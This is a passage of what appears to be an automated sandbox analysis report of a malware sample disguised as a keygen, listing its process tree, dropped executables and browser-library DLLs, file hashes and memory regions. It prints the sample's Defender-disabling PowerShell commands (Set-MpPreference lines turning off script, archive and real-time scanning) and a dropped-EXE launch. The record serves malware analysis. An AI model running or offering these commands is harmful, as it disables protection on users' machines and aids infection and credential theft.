C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\wmimpxhi.exe2⤵
-
C:\Windows\temp\wmimpxhi.exeC:\Windows\temp\wmimpxhi.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\d3ddde34bd2148579399e0ec6b9aecac /t 416 /p 5041⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\a5dd4706d9064727a4d6b934f7cb734a /t 2972 /p 29681⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b1819abdb2684d88930136de7e580d56 /t 2328 /p 58001⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\79b9954a1bc942248a851d20a38d1381 /t 2720 /p 22401⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1nONCENDZY.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3glqQ5zu6q.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Q0ASSF3gqn.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SmMNW0P9JH.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zfog5KVMBE.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tdwmwhz8zi.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LKZ4EUPR.cookie
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe
-
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe
-
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\Keygen.exe
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\Keygen.exe
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\b.hta
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\b1.hta
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba.hta
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba1.hta
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\m.hta
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\m1.hta
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\start.bat
-
C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe
-
C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
-
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe
-
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe
-
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe
-
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe
-
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe
-
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe
-
C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe
-
C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
-
C:\Users\Public\hJiKhtso.bat
-
C:\Users\Public\mkx.exe
-
C:\Users\Public\mkx.exe
-
C:\Users\Public\mkx.exe
-
C:\Users\Public\pvr.exe
-
C:\Users\Public\pvr.exe
-
C:\Users\Public\txi.exe
-
C:\Users\Public\txi.exe
-
C:\Users\Public\txi.exe
-
C:\Windows\Temp\vokybpfg.exeMD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
C:\Windows\Temp\wmimpxhi.exeMD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
C:\Windows\temp\hazyeme1.inf
-
C:\Windows\temp\rnwabiyd.inf
-
C:\Windows\temp\vokybpfg.exeMD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
C:\Windows\temp\wmimpxhi.exeMD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
\ProgramData\mozglue.dll
-
\ProgramData\mozglue.dll
-
\ProgramData\nss3.dll
-
\ProgramData\nss3.dll
-
\ProgramData\sqlite3.dll
-
\ProgramData\sqlite3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
-
memory/488-305-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/488-299-0x0000000000000000-mapping.dmp
-
memory/504-2-0x0000000000000000-mapping.dmp
-
memory/504-3-0x0000000000000000-mapping.dmp
-
memory/508-307-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/508-301-0x0000000000000000-mapping.dmp
-
memory/568-309-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/568-304-0x0000000000000000-mapping.dmp
-
memory/584-20-0x0000000000000000-mapping.dmp
-
memory/920-9-0x0000000000000000-mapping.dmp
-
memory/956-277-0x0000000000000000-mapping.dmp
-
memory/960-845-0x0000000000000000-mapping.dmp
-
memory/960-847-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/1092-14-0x0000000000000000-mapping.dmp
-
memory/1436-10-0x0000000000000000-mapping.dmp
-
memory/1528-23-0x0000000000000000-mapping.dmp
-
memory/1528-81-0x00000000087E0000-0x00000000087E1000-memory.dmpFilesize
4KB
-
memory/1528-28-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/1528-39-0x0000000007770000-0x0000000007771000-memory.dmpFilesize
4KB
-
memory/1904-18-0x0000000000000000-mapping.dmp
-
memory/2128-853-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/2128-850-0x0000000000000000-mapping.dmp
-
memory/2168-99-0x0000000009620000-0x0000000009621000-memory.dmpFilesize
4KB
-
memory/2168-105-0x000000000A600000-0x000000000A601000-memory.dmpFilesize
4KB
-
memory/2168-32-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/2168-69-0x0000000007B50000-0x0000000007B51000-memory.dmpFilesize
4KB
-
memory/2168-22-0x0000000000000000-mapping.dmp
-
memory/2224-12-0x0000000000000000-mapping.dmp
-
memory/2252-763-0x0000000000000000-mapping.dmp
-
memory/2276-7-0x0000000000000000-mapping.dmp
-
memory/2284-26-0x0000000000000000-mapping.dmp
-
memory/2284-45-0x00000000077A0000-0x00000000077A1000-memory.dmpFilesize
4KB
-
memory/2284-63-0x00000000081A0000-0x00000000081A1000-memory.dmpFilesize
4KB
-
memory/2284-30-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/2300-240-0x0000000000000000-mapping.dmp
-
memory/2300-244-0x0000000004B80000-0x0000000004C81000-memory.dmpFilesize
1.0MB
-
memory/2420-862-0x0000000000000000-mapping.dmp
-
memory/2420-866-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/2424-235-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/2424-232-0x000000000040616E-mapping.dmp
-
memory/2424-231-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/2428-773-0x0000000000000000-mapping.dmp
-
memory/2480-296-0x0000000000000000-mapping.dmp
-
memory/2480-303-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/2564-214-0x0000000000000000-mapping.dmp
-
memory/2664-843-0x0000017BD5B60000-0x0000017BD5B61000-memory.dmpFilesize
4KB
-
memory/2664-836-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/2664-835-0x0000000000000000-mapping.dmp
-
memory/2744-0-0x0000000000000000-mapping.dmp
-
memory/2816-283-0x0000000009670000-0x00000000096A3000-memory.dmpFilesize
204KB
-
memory/2816-310-0x0000000009350000-0x0000000009351000-memory.dmpFilesize
4KB
-
memory/2816-290-0x00000000092B0000-0x00000000092B1000-memory.dmpFilesize
4KB
-
memory/2816-291-0x00000000097A0000-0x00000000097A1000-memory.dmpFilesize
4KB
-
memory/2816-267-0x0000000008310000-0x0000000008311000-memory.dmpFilesize
4KB
-
memory/2816-256-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/2816-316-0x0000000009330000-0x0000000009331000-memory.dmpFilesize
4KB
-
memory/2816-263-0x0000000007E10000-0x0000000007E11000-memory.dmpFilesize
4KB
-
memory/2816-255-0x0000000000000000-mapping.dmp
-
memory/2844-187-0x0000000000000000-mapping.dmp
-
memory/2976-825-0x0000000000000000-mapping.dmp
-
memory/3044-318-0x0000000000000000-mapping.dmp
-
memory/3044-323-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/3060-614-0x0000000000240000-0x0000000000241000-memory.dmpFilesize
4KB
-
memory/3060-624-0x0000000006F50000-0x0000000006FAB000-memory.dmpFilesize
364KB
-
memory/3060-738-0x0000000005800000-0x0000000005859000-memory.dmpFilesize
356KB
-
memory/3060-602-0x0000000000000000-mapping.dmp
-
memory/3060-605-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3100-607-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/3100-609-0x000000000041A684-mapping.dmp
-
memory/3100-611-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/3172-772-0x0000000000000000-mapping.dmp
-
memory/3172-768-0x0000000002C40000-0x0000000002C41000-memory.dmpFilesize
4KB
-
memory/3172-790-0x0000000000000000-mapping.dmp
-
memory/3172-787-0x0000000002C10000-0x0000000002C11000-memory.dmpFilesize
4KB
-
memory/3172-765-0x0000000000000000-mapping.dmp
-
memory/3172-762-0x0000000002980000-0x0000000002981000-memory.dmpFilesize
4KB
-
memory/3172-780-0x0000000000000000-mapping.dmp
-
memory/3196-766-0x0000000000000000-mapping.dmp
-
memory/3196-778-0x0000000000000000-mapping.dmp
-
memory/3196-774-0x0000000002FD0000-0x0000000002FD1000-memory.dmpFilesize
4KB
-
memory/3196-719-0x0000000002F70000-0x0000000002F71000-memory.dmpFilesize
4KB
-
memory/3196-727-0x0000000000000000-mapping.dmp
-
memory/3196-725-0x0000000003230000-0x0000000003231000-memory.dmpFilesize
4KB
-
memory/3196-722-0x0000000000000000-mapping.dmp
-
memory/3312-249-0x0000000000403BEE-mapping.dmp
-
memory/3312-252-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3312-248-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/3428-733-0x0000000000000000-mapping.dmp
-
memory/3432-794-0x000000000040616E-mapping.dmp
-
memory/3432-797-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3436-799-0x0000000000000000-mapping.dmp
-
memory/3436-805-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3436-823-0x0000000006C60000-0x0000000006C61000-memory.dmpFilesize
4KB
-
memory/3436-818-0x0000000007670000-0x0000000007671000-memory.dmpFilesize
4KB
-
memory/3560-188-0x0000000000000000-mapping.dmp
-
memory/3560-218-0x0000000005520000-0x0000000005536000-memory.dmpFilesize
88KB
-
memory/3560-191-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3560-192-0x0000000000C50000-0x0000000000C51000-memory.dmpFilesize
4KB
-
memory/3560-217-0x00000000054E0000-0x000000000551C000-memory.dmpFilesize
240KB
-
memory/3608-24-0x0000000000000000-mapping.dmp
-
memory/3608-87-0x0000000009650000-0x0000000009651000-memory.dmpFilesize
4KB
-
memory/3608-27-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3608-51-0x0000000007600000-0x0000000007601000-memory.dmpFilesize
4KB
-
memory/3608-57-0x0000000007670000-0x0000000007671000-memory.dmpFilesize
4KB
-
memory/3608-70-0x0000000007720000-0x0000000007721000-memory.dmpFilesize
4KB
-
memory/3608-93-0x0000000008C20000-0x0000000008C21000-memory.dmpFilesize
4KB
-
memory/3608-75-0x00000000080D0000-0x00000000080D1000-memory.dmpFilesize
4KB
-
memory/3672-720-0x000000000040C76E-mapping.dmp
-
memory/3672-723-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3680-15-0x0000000000000000-mapping.dmp
-
memory/3712-21-0x0000000000000000-mapping.dmp
-
memory/3712-29-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3712-102-0x00000000099B0000-0x00000000099B1000-memory.dmpFilesize
4KB
-
memory/3724-872-0x0000000000000000-mapping.dmp
-
memory/3724-877-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/3764-201-0x0000000000D70000-0x0000000000D71000-memory.dmpFilesize
4KB
-
memory/3764-228-0x00000000070D0000-0x0000000007101000-memory.dmpFilesize
196KB
-
memory/3764-200-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/3764-197-0x0000000000000000-mapping.dmp
-
memory/3948-328-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/3948-322-0x0000000000000000-mapping.dmp
-
memory/3984-883-0x0000000000000000-mapping.dmp
-
